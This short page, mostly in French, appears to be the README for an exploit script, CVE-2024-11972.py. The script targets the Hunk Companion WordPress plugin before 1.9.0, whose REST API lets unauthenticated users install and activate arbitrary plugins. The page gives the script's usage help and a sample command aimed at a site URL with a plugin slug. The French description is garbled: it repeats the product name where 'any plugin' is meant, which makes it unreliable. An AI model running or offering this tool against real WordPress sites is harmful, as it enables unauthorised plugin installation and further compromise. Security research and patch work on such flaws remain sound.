
Hunk Companion < 1.9.0 - Installation de plugin non authentifiée
Hunk Companion < 1.9.0 - Installation de plugin non authentifiée
Le plugin WordPress Hunk Companion avant la version 1.9.0 n'autorise pas correctement certains points de terminaison de l'API REST, permettant à des requêtes non authentifiées d'installer et d'activer arbitrairement un plugin WordPress Hunk Companion antérieur à 1.9.0 depuis le dépôt WordPress.org, y compris des plugins WordPress Hunk Companion vulnérables ayant été fermés.
usage: CVE-2024-11972.py [-h] -u URL [-p PLUGIN]
Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-p PLUGIN, --plugin PLUGIN
Plugin slug (default: Yoast SEO)
python CVE-2024-11972.py -u "http://example.com" -p "plugin-slug"